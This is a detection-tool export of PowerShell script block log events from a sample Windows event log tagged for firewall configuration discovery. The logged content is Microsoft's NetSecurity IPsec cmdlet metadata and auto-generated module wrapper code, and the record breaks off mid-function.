+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewDisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <CmdletParameterMetadata PSName=""Enabled""/> </Parameter> <Parameter ParameterName=""Profiles""> <Type PSType=""NetSecurity.Profile""/> <CmdletParameterMetadata PSName=""Profile""/> </Parameter> <Parameter ParameterName=""Platforms""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""Platform""/> </Parameter> <Parameter ParameterName=""Mode""> <Type PSType=""NetSecurity.IPsecMode""/> <CmdletParameterMetadata PSName=""Mode""/> </Parameter> <Parameter ParameterName=""InboundSecurity""> <Type PSType=""NetSecurity.SecurityPolicy""/> <CmdletParameterMetadata Aliases=""SecIn"" PSName=""InboundSecurity""/> </Parameter> <Parameter ParameterName=""OutboundSecurity""> <Type PSType=""NetSecurity.SecurityPolicy""/> <CmdletParameterMetadata Aliases=""SecOut"" PSName=""OutboundSecurity""/> </Parameter> <Parameter ParameterName=""QuickModeCryptoSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""QuickModeCryptoSet""/> </Parameter> <Parameter ParameterName=""Phase1AuthSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Phase1AuthSet""/> </Parameter> <Parameter ParameterName=""Phase2AuthSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Phase2AuthSet""/> </Parameter> <Parameter ParameterName=""KeyModule""> <Type PSType=""NetSecurity.KeyModule""/> <CmdletParameterMetadata PSName=""KeyModule""/> </Parameter> <Parameter ParameterName=""AllowWatchKey""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""AllowWatchKey""/> </Parameter> <Parameter ParameterName=""AllowSetKey""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""AllowSetKey""/> </Parameter> <Parameter ParameterName=""LocalTunnelEndpoint""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalTunnelEndpoint""/> </Parameter> <Parameter ParameterName=""RemoteTunnelEndpoint""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemoteTunnelEndpoint""/> </Parameter> <Parameter ParameterName=""RemoteTunnelEndpointDNSName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteTunnelHostname""/> </Parameter> <Parameter ParameterName=""MaxReturnPathLifetimeSeconds""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""ForwardPathLifetime""/> </Parameter> <Parameter ParameterName=""BypassTunnelIfEncrypted""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""EncryptedTunnelBypass""/> </Parameter> <Parameter ParameterName=""RequireAuthorization""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""RequireAuthorization""/> </Parameter> <Parameter ParameterName=""Users""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""User""/> </Parameter> <Parameter ParameterName=""Machines""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Machine""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemoteAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Protocol""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Protocol""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalPort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalPort""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemotePort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemotePort""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:InterfaceAlias""> <Type PSType=""System.Management.Automation.WildcardPattern[]""/> <CmdletParameterMetadata PSName=""InterfaceAlias""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:InterfaceType""> <Type PSType=""NetSecurity.InterfaceType""/> <CmdletParameterMetadata PSName=""InterfaceType""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata ValueFromPipelineByPropertyName=""true"" Aliases=""ID Name"" PSName=""IPsecRuleName"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByIPsecRuleName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayName"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayGroup"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayGroup""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" IsMandatory=""true"" CmdletParameterSets=""ByGroup""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Rename"" ConfirmImpact=""Medium""/> <Method MethodName=""Rename""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Copy"" ConfirmImpact=""Medium""/> <Method MethodName=""CloneObject""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewPolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewPolicyStore""/> </Parameter> <Parameter ParameterName=""NewGPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewGPOSession""/> </Parameter> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Enable"" ConfirmImpact=""Medium""/> <Method MethodName=""Enable""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Disable"" ConfirmImpact=""Medium""/> <Method MethodName=""Disable""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Sync"" ConfirmImpact=""Medium""/> <Method MethodName=""SyncPolicyDelta""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""Servers""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""Servers""> <ValidateNotNull/> <ValidateNotNullOrEmpty/> </CmdletParameterMetadata> </Parameter> <Parameter ParameterName=""Domains""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""Domains""> <ValidateNotNull/> <ValidateNotNullOrEmpty/> </CmdletParameterMetadata> </Parameter> <Parameter ParameterName=""EndpointType""> <Type PSType=""NetSecurity.EndpointType""/> <CmdletParameterMetadata PSName=""EndpointType""/> </Parameter> <Parameter ParameterName=""AddressType""> <Type PSType=""NetSecurity.AddressVersion""/> <CmdletParameterMetadata PSName=""AddressType""/> </Parameter> <Parameter ParameterName=""Output""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletOutputMetadata PSName=""Output""/> </Parameter> <Parameter ParameterName=""DnsServers""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""DnsServers""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Update"" ConfirmImpact=""Medium""/> <Method MethodName=""SetPolicyDelta""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""Action""> <Type PSType=""NetSecurity.Chan",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"geAction""/> <CmdletParameterMetadata IsMandatory=""true"" ValueFromPipelineByPropertyName=""true"" PSName=""Action""/> </Parameter> <Parameter ParameterName=""IPv6Addresses""> <Type PSType=""string[]""/> <CmdletParameterMetadata ValueFromPipelineByPropertyName=""true"" PSName=""IPv6Addresses""/> </Parameter> <Parameter ParameterName=""IPv4Addresses""> <Type PSType=""string[]""/> <CmdletParameterMetadata ValueFromPipelineByPropertyName=""true"" PSName=""IPv4Addresses""/> </Parameter> <Parameter ParameterName=""EndpointType""> <Type PSType=""NetSecurity.EndpointType""/> <CmdletParameterMetadata IsMandatory=""true"" ValueFromPipelineByPropertyName=""true"" PSName=""EndpointType""/> </Parameter> <Parameter ParameterName=""PassThru""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata PSName=""PassThru""/> </Parameter> <Parameter ParameterName=""Output""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletOutputMetadata PSName=""Output""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery> <CmdletParameterMetadata IsMandatory=""true"" ValueFromPipelineByPropertyName=""true"" Aliases=""ID Name"" PSName=""IPsecRuleName""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""New"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:CreateInstance""> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""InstanceID""> <Type PSType=""string""/> <CmdletParameterMetadata ValueFromPipelineByPropertyName=""true"" Aliases=""ID Name"" PSName=""IPsecRuleName""/> </Parameter> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""DisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""RuleGroup""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Group""/> </Parameter> <Parameter ParameterName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <CmdletParameterMetadata PSName=""Enabled""/> </Parameter> <Parameter ParameterName=""Profiles""> <Type PSType=""NetSecurity.Profile""/> <CmdletParameterMetadata PSName=""Profile""/> </Parameter> <Parameter ParameterName=""Platforms""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""Platform""/> </Parameter> <Parameter ParameterName=""Mode""> <Type PSType=""NetSecurity.IPsecMode""/> <CmdletParameterMetadata PSName=""Mode""/> </Parameter> <Parameter ParameterName=""InboundSecurity""> <Type PSType=""NetSecurity.SecurityPolicy""/> <CmdletParameterMetadata Aliases=""SecIn"" PSName=""InboundSecurity""/> </Parameter> <Parameter ParameterName=""OutboundSecurity""> <Type PSType=""NetSecurity.SecurityPolicy""/> <CmdletParameterMetadata Aliases=""SecOut"" PSName=""OutboundSecurity""/> </Parameter> <Parameter ParameterName=""QuickModeCryptoSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""QuickModeCryptoSet""/> </Parameter> <Parameter ParameterName=""Phase1AuthSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Phase1AuthSet""/> </Parameter> <Parameter ParameterName=""Phase2AuthSet""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Phase2AuthSet""/> </Parameter> <Parameter ParameterName=""KeyModule""> <Type PSType=""NetSecurity.KeyModule""/> <CmdletParameterMetadata PSName=""KeyModule""/> </Parameter> <Parameter ParameterName=""AllowWatchKey""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""AllowWatchKey""/> </Parameter> <Parameter ParameterName=""AllowSetKey""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""AllowSetKey""/> </Parameter> <Parameter ParameterName=""LocalTunnelEndpoint""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalTunnelEndpoint""/> </Parameter> <Parameter ParameterName=""RemoteTunnelEndpoint""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemoteTunnelEndpoint""/> </Parameter> <Parameter ParameterName=""RemoteTunnelEndpointDNSName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteTunnelHostname""/> </Parameter> <Parameter ParameterName=""MaxReturnPathLifetimeSeconds""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""ForwardPathLifetime""/> </Parameter> <Parameter ParameterName=""BypassTunnelIfEncrypted""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""EncryptedTunnelBypass""/> </Parameter> <Parameter ParameterName=""RequireAuthorization""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""RequireAuthorization""/> </Parameter> <Parameter ParameterName=""Users""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""User""/> </Parameter> <Parameter ParameterName=""Machines""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Machine""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemoteAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Protocol""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Protocol""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalPort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalPort""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemotePort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemotePort""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:InterfaceAlias""> <Type PSType=""System.Management.Automation.WildcardPattern[]""/> <CmdletParameterMetadata PSName=""InterfaceAlias""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:InterfaceType""> <Type PSType=""NetSecurity.InterfaceType""/> <CmdletParameterMetadata PSName=""InterfaceType""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Show""/> <Method MethodName=""EnumerateFull""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""Dependents""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement""/> <CmdletOutputMetadata PSName=""Dependents""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Find""/> <Method MethodName=""Find""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""LocalAddress""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""LocalAddress""/> </Parameter> <Parameter ParameterName=""RemoteAddress""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""RemoteAddress""/> </Parameter> <Parameter ParameterName=""Protocol""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Protocol""/> </Parameter> <Parameter ParameterName=""LocalPort""> <Type PSType=""uint16""/> <CmdletParameterMetadata PSName=""LocalPort""/> </Parameter> <Parameter ParameterName=""RemotePort""> <Type PSType=""uint16""/> <CmdletParameterMetadata PSName=""RemotePort""/> </Parameter> <Parameter ParameterName=""CmdletOutput""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletOutputMetadata PSName=""CmdletOutput""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.Enabled"" UnderlyingType=""uint16""> <Value Name=""True"" Value=""1""/> <Value Name=""False"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.Profile"" UnderlyingType=""uint16"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""Public"" Value=""4""/> <Value Name=""Private"" Value=""2""/> <Value Name=""Domain"" Value=""1""/> <Value Name=""NotApplicable"" Value=""65535""/> </Enum> <Enum EnumName=""NetSecurity.IPsecMode"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Transport"" Value=""3""/> <Value Name=""Tunnel"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.SecurityPolicy"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Request"" Value=""1""/> <Value Name=""Require"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.KeyModule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"UnderlyingType=""uint16"" BitwiseFlags=""true""> <Value Name=""IKEv1"" Value=""1""/> <Value Name=""IKEv2"" Value=""4""/> <Value Name=""AuthIP"" Value=""2""/> <Value Name=""Default"" Value=""0""/> </Enum> <Enum EnumName=""NetSecurity.InterfaceType"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""Wired"" Value=""1""/> <Value Name=""Wireless"" Value=""2""/> <Value Name=""RemoteAccess"" Value=""4""/> </Enum> <Enum EnumName=""NetSecurity.PrimaryStatus"" UnderlyingType=""uint16""> <Value Name=""Unknown"" Value=""0""/> <Value Name=""OK"" Value=""1""/> <Value Name=""Inactive"" Value=""2""/> <Value Name=""Error"" Value=""3""/> </Enum> <Enum EnumName=""NetSecurity.PolicyStoreType"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Local"" Value=""1""/> <Value Name=""GroupPolicy"" Value=""2""/> <Value Name=""Dynamic"" Value=""3""/> <Value Name=""Generated"" Value=""4""/> <Value Name=""Hardcoded"" Value=""5""/> </Enum> <Enum EnumName=""NetSecurity.EndpointType"" UnderlyingType=""uint16""> <Value Name=""Endpoint1"" Value=""0""/> <Value Name=""Endpoint2"" Value=""1""/> </Enum> <Enum EnumName=""NetSecurity.AddressVersion"" UnderlyingType=""uint16"" BitwiseFlags=""true""> <Value Name=""None"" Value=""0""/> <Value Name=""IPv4"" Value=""1""/> <Value Name=""IPv6"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.ChangeAction"" UnderlyingType=""uint16""> <Value Name=""Add"" Value=""0""/> <Value Name=""Delete"" Value=""1""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 